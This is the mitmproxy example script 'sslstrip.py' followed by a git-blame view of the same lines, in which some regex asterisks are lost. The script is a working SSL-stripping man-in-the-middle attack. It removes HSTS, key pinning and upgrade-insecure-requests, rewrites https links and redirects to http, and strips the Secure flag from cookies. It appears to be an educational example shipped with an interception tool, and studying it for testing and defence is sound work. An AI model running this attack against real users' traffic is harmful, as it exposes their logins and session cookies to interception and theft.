mitmproxy/examples/complex/sslstrip.py

"""
This script implements an sslstrip-like attack based on mitmproxy.
https://moxie.org/software/sslstrip/
"""
import re
import urllib.parse
import typing  # noqa

from mitmproxy import http

# set of SSL/TLS capable hosts
secure_hosts = set()  # type: typing.Set[str]


def request(flow: http.HTTPFlow) -> None:
    flow.request.headers.pop('If-Modified-Since', None)
    flow.request.headers.pop('Cache-Control', None)

    # do not force https redirection
    flow.request.headers.pop('Upgrade-Insecure-Requests', None)

    # proxy connections to SSL-enabled hosts
    if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443

        # We need to update the request destination to whatever is specified in the host header:
        # Having no TLS Server Name Indication from the client and just an IP address as request.host
        # in transparent mode, TLS server name certificate validation would fail.
        flow.request.host = flow.request.pretty_host


def response(flow: http.HTTPFlow) -> None:
    flow.response.headers.pop('Strict-Transport-Security', None)
    flow.response.headers.pop('Public-Key-Pins', None)

    # strip links in response body
    flow.response.content = flow.response.content.replace(b'https://', b'http://')

    # strip meta tag upgrade-insecure-requests in response body
    csp_meta_tag_pattern = b'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
    flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)

    # strip links in 'Location' header
    if flow.response.headers.get('Location', '').startswith('https://'):
        location = flow.response.headers['Location']
        hostname = urllib.parse.urlparse(location).hostname
        if hostname:
            secure_hosts.add(hostname)
        flow.response.headers['Location'] = location.replace('https://', 'http://', 1)

    # strip upgrade-insecure-requests in Content-Security-Policy header
    if re.search('upgrade-insecure-requests', flow.response.headers.get('Content-Security-Policy', ''), flags=re.IGNORECASE):
        csp = flow.response.headers['Content-Security-Policy']
        flow.response.headers['Content-Security-Policy'] = re.sub('upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)

    # strip secure flag from 'Set-Cookie' headers
    cookies = flow.response.headers.get_all('Set-Cookie')
    cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
    flow.response.headers.set_all('Set-Cookie', cookies)
organize examples This commit is largely based on work by Thiago Arrais (@thiagoarrais) and Shane Bradfield (@l33tLumberjack). I wasn't really able to get their PR reasonably merged onto the latest master, so I reapplied their changes manually here and did some further improvements on that. 2016-11-21 01:16:20 +00:00			`"""`
			`This script implements an sslstrip-like attack based on mitmproxy.`
			`https://moxie.org/software/sslstrip/`
			`"""`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00			`import re`
Extend mypy checking, fix #2194 (#2819) 2018-02-03 20:37:33 +00:00			`import urllib.parse`
			`import typing # noqa`

			`from mitmproxy import http`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00
remove context from all scripts 2016-07-08 01:37:33 +00:00			`# set of SSL/TLS capable hosts`
Extend mypy checking, fix #2194 (#2819) 2018-02-03 20:37:33 +00:00			`secure_hosts = set() # type: typing.Set[str]`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00

Extend mypy checking, fix #2194 (#2819) 2018-02-03 20:37:33 +00:00			`def request(flow: http.HTTPFlow) -> None:`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00			`flow.request.headers.pop('If-Modified-Since', None)`
			`flow.request.headers.pop('Cache-Control', None)`

Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`# do not force https redirection`
			`flow.request.headers.pop('Upgrade-Insecure-Requests', None)`

format examples 2016-05-29 08:23:39 +00:00			`# proxy connections to SSL-enabled hosts`
remove context from all scripts 2016-07-08 01:37:33 +00:00			`if flow.request.pretty_host in secure_hosts:`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00			`flow.request.scheme = 'https'`
			`flow.request.port = 443`
explain host=pretty_host assignment 2016-11-09 12:11:31 +00:00
			`# We need to update the request destination to whatever is specified in the host header:`
			`# Having no TLS Server Name Indication from the client and just an IP address as request.host`
			`# in transparent mode, TLS server name certificate validation would fail.`
fix SNI for transparent mode - #1638 In transparent mode host is set with the target server ip. Attribute flow.request.host is used as SNI while mitmproxy is initiating TLS handshake, so it should be set with the pretty_host. 2016-11-08 14:39:24 +00:00			`flow.request.host = flow.request.pretty_host`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00

Extend mypy checking, fix #2194 (#2819) 2018-02-03 20:37:33 +00:00			`def response(flow: http.HTTPFlow) -> None:`
Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`flow.response.headers.pop('Strict-Transport-Security', None)`
			`flow.response.headers.pop('Public-Key-Pins', None)`
update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00
			`# strip links in response body`
organize examples This commit is largely based on work by Thiago Arrais (@thiagoarrais) and Shane Bradfield (@l33tLumberjack). I wasn't really able to get their PR reasonably merged onto the latest master, so I reapplied their changes manually here and did some further improvements on that. 2016-11-21 01:16:20 +00:00			`flow.response.content = flow.response.content.replace(b'https://', b'http://')`
update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00
Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`# strip meta tag upgrade-insecure-requests in response body`
			`csp_meta_tag_pattern = b'<meta.http-equiv=["\']Content-Security-Policy[\'"].upgrade-insecure-requests.*?>'`
			`flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)`

update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00			`# strip links in 'Location' header`
			`if flow.response.headers.get('Location', '').startswith('https://'):`
			`location = flow.response.headers['Location']`
			`hostname = urllib.parse.urlparse(location).hostname`
			`if hostname:`
Merge remote-tracking branch 'origin/master' into message-body-encoding 2016-07-16 06:17:57 +00:00			`secure_hosts.add(hostname)`
update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00			`flow.response.headers['Location'] = location.replace('https://', 'http://', 1)`

Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`# strip upgrade-insecure-requests in Content-Security-Policy header`
			`if re.search('upgrade-insecure-requests', flow.response.headers.get('Content-Security-Policy', ''), flags=re.IGNORECASE):`
			`csp = flow.response.headers['Content-Security-Policy']`
			`flow.response.headers['Content-Security-Policy'] = re.sub('upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)`

update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00			`# strip secure flag from 'Set-Cookie' headers`
			`cookies = flow.response.headers.get_all('Set-Cookie')`
			`cookies = [re.sub(r';\ssecure\s', '', s) for s in cookies]`
			`flow.response.headers.set_all('Set-Cookie', cookies)`